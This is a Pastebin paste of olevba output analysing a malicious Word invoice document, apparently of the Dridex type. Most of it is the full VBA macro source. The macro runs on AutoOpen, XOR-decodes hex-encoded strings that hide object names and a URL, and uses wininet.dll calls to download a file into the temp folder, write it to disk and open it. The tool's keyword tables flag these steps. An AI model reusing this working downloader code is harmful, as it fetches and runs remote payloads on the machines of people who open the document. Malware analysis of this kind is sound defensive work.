Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- inv_30~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: inv_30~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: inv_30~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub VICTOR(MARTIN As Long)
- JEREMY
- End Sub
- Sub autoopen()
- VICTOR 544
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO OIDL8.bas
- in file: inv_30~1.doc - OLE stream: u'Macros/VBA/OIDL8'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function JEFFERY() As Object
- Dim LAWRENCE As String
- LAWRENCE = ALBERT(EDDIE, EDWIN)
- Set JEFFERY = CreateObject(LAWRENCE)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+--------------------------+
- | Type | Keyword | Description |
- +------------+--------------+--------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- +------------+--------------+--------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO PIDLE0.bas
- in file: inv_30~1.doc - OLE stream: u'Macros/VBA/PIDLE0'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function JEFF(ByRef NICHOLAS As Object) As Object
- Set JEFF = NICHOLAS.GetSpecialFolder(2)
- End Function
- Sub ROY(CALEIGH As Long)
- BENJAMIN ("BRUCE")
- End Sub
- Public Function BENJAMIN(VINCENTs As String)
- VINCENT
- End Function
- Public Function ALBERT(BRANDON As String, ADAM As String) As String
- Dim TONY As Integer
- Dim LUIS As Integer
- Dim WAYNE As Double
- For WAYNE = 42 To 43
- If WAYNE = 32 Then End
- Next WAYNE
- Dim BILLY As Long
- Dim STEVE As String
- For BILLY = 1 _
- To _
- ( _
- ANTONIO _
- (ADAM) _
- / 2)
- TONY = CHRIS(ADAM, BILLY)
- LUIS = EARL(BRANDON, BILLY)
- STEVE = STEVE + PHILIP(TONY, LUIS)
- Next BILLY
- ALBERT = STEVE
- End Function
- Sub JEREMY()
- Dim AARON As Long
- Dim RANDY As Integer
- For RANDY = 414 To 416
- If RANDY = 1312 Then End
- Next RANDY
- ROY (5)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO IDL4.bas
- in file: inv_30~1.doc - OLE stream: u'Macros/VBA/IDL4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function EARL(ByRef BRANDON As String, ByRef BILLY As Long) As Integer
- EARL = Asc(JIMMY(BRANDON, _
- ((BILLY Mod ANTONIO(BRANDON)) + 1), 1))
- End Function
- Public Function VINCENT()
- Dim MELVIN As Object
- Dim JESUS As Integer
- For JESUS = 84 To 85
- JESUS = JESUS + 15
- Next JESUS
- Dim GLENN As Object
- For JESUS = 70 To 71
- JESUS = JESUS + 5
- Next JESUS
- Set GLENN _
- = JEFFERY()
- For JESUS = 72 To 73
- JESUS = JESUS + 8
- Next JESUS
- Set MELVIN = JEFF(JEFFERY)
- Dim CHAD
- Dim JACOB
- JACOB = EUGENE(1024, EDDIE, FREDERICK)
- For JESUS = 92 To 93
- JESUS = JESUS + 9
- Next JESUS
- CHAD = MELVIN & JACOB
- If FRANCIS(GLENN, CHAD) Then
- GLENN. _
- DeleteFile CHAD
- End If
- If DALE(CHAD) Then
- End If
- If FRANCIS(GLENN, CHAD) Then
- End If
- Dim RALPH
- Set RALPH = CreateObject _
- (ALBERT _
- (EDDIE, HERBERT))
- RALPH.Open CHAD
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+--------------------------+
- | Type | Keyword | Description |
- +------------+--------------+--------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- +------------+--------------+--------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO FILE6.bas
- in file: inv_30~1.doc - OLE stream: u'Macros/VBA/FILE6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- Public Const HERBERT = "122F222E3B77142635223E2A29352E282C"
- Public Const FREDERICK = "1D352E38383B6478756032312D"
- Public Const JOEL = "293333326D767A3721223E3D213124222C3623307826213A667B74746874626D7B333D2B"
- Public Const EDWIN = "1224352B272D3C38226011202424143E31233C38192724322A3C"
- Public Const EDDIE = "HAGGBWYUVENWI"
- Public Const JAMES = "JOHN"
- #If VBA7 And Win64 Then
- Public _
- Declare _
- PtrSafe _
- Function _
- ROBERT Lib _
- "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long
- Public _
- Declare _
- PtrSafe _
- Function _
- MICHAEL Lib _
- "wininet.dll" Alias "InternetOpenA" (ByVal CHARLES As String, ByVal MARVINPH As Long, ByVal THOMAS As String, ByVal CHRISTOPHER As String, ByVal DANIEL As Long) As LongPtr
- Public _
- Declare _
- PtrSafe _
- Function _
- WILLIAM Lib _
- "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal MARK As String, ByVal DONALD As Long, GEORGE As Long) As Integer
- Public _
- Declare _
- PtrSafe _
- Function _
- DAVID Lib _
- "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal STEVEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
- #Else
- Public Declare Function ROBERT Lib "wininet.dll" _
- Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long
- Public Declare Function MICHAEL Lib "wininet.dll" _
- Alias "InternetOpenA" (ByVal CHARLES As String, ByVal MARVINPH As Long, ByVal THOMAS As String, ByVal CHRISTOPHER As String, ByVal DANIEL As Long) As Long
- Public Declare Function WILLIAM Lib "wininet.dll" _
- Alias "InternetReadFile" (ByVal PAUL As Long, ByVal MARK As String, ByVal DONALD As Long, GEORGE As Long) As Integer
- Public Declare Function DAVID Lib "wininet.dll" _
- Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal STEVEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
- #End If
- Private Const MANUEL = 8162
- Private Const RODNEY As String = "CURTIS"
- Private Const NORMAN = 1
- Private Const ALLEN = &H4000000
- Public Function DALE _
- (ByVal MARVIN As String) As Boolean
- #If VBA7 _
- And Win64 Then
- Dim LEONARD As LongPtr, STANLEY As LongPtr
- #Else
- Dim LEONARD As Long, STANLEY As Long
- #End If
- Dim FRANK As Long
- Dim MARK As String * MANUEL, CHARLES As String
- Dim MIKE As Integer, NATHAN As Double
- LEONARD = VINNIPUH
- If LEONARD = 0 Then
- Exit Function
- End If
- Dim STEPHEN As Boolean
- If ANDREW(STANLEY, LEONARD) Then
- End If
- If STANLEY = 0 Then
- NATHAN = 0
- Else
- WILLIAM STANLEY, MARK, MANUEL, FRANK
- CHARLES = MARK
- Dim RAYMOND As Long
- For RAYMOND = 321 To 322
- If RAYMOND = 1232 Then End
- Next RAYMOND
- Do While FRANK <> 0
- WILLIAM STANLEY, MARK, MANUEL, FRANK
- CHARLES = CHARLES + Mid(MARK, 1, FRANK)
- Loop
- NATHAN = ANTONIO(CHARLES): _
- MIKE = DANNY("JERRY")
- Open MARVIN _
- For Binary Access Write _
- Lock Write _
- As #MIKE
- Put #MIKE, _
- , CHARLES
- Dim DENNIS As Double
- For DENNIS = 42 To 43
- If DENNIS = 437 Then End
- Next DENNIS
- Close #MIKE
- End If
- ROBERT STANLEY
- ROBERT LEONARD
- CHARLES = ""
- If NATHAN Then
- DALE = True
- End If
- End Function
- Public Function PHILIP(ByRef TONY As Integer, ByRef LUIS As Integer) As String
- PHILIP = Chr(TONY Xor LUIS)
- End Function
- Public Function CHRIS(ByRef ADAM As String, ByRef BILLY As Long) As Integer
- CHRIS = Val("&H" & (JIMMY(ADAM, JOHNNY(BILLY), 2)))
- End Function
- Public Function JOHNNY(ByRef BILLY As Long) As Long
- JOHNNY = (2 * BILLY) - 1
- End Function
- Public Function JIMMY(ByRef BRYAN As String, ByRef TONY As Integer, ByRef LUIS As Integer) As String
- JIMMY = Mid$(BRYAN, TONY, LUIS)
- End Function
- Public Function ANTONIO(BRYAN As String) As Long
- ANTONIO = Len(BRYAN)
- End Function
- Public Function DANNY(BRYAN As String) As Integer
- DANNY = FreeFile
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO IDL3.bas
- in file: inv_30~1.doc - OLE stream: u'Macros/VBA/IDL3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function FRANCIS(ByRef RYAN As Object, ByVal ROGER As String) As Boolean
- If RYAN.FileExists(ROGER) Then
- FRANCIS = True
- Else
- FRANCIS = False
- End If
- End Function
- #If VBA7 _
- And Win64 Then
- Public Function ANDREW(ByRef JOE As LongPtr, JUAN As LongPtr) As Boolean
- #Else
- Public Function ANDREW(ByRef JOE As Long, JUAN As Long) As Boolean
- #End If
- Dim JACK As String
- Dim HOWARD As Long
- JACK _
- = EUGENE(325, EDDIE, JOEL)
- JOE _
- = DAVID _
- ( _
- JUAN, _
- JACK, vbNullString, _
- 0, _
- ALLEN, 0)
- ANDREW = True
- End Function
- #If VBA7 _
- And Win64 Then
- Public Function VINNIPUH() As LongPtr
- #Else
- Public Function VINNIPUH() As Long
- #End If
- VINNIPUH = MICHAEL(RODNEY, NORMAN, vbNullString, vbNullString, 0)
- End Function
- Public Function EUGENE(BOBBY As Long, CARLOS As String, RUSSELL As String) As String
- EUGENE = ALBERT(CARLOS, RUSSELL)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement